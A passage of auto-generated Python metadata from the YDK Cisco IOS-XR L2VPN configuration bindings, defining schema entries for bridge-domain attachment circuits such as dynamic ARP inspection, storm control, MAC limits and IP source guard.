'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
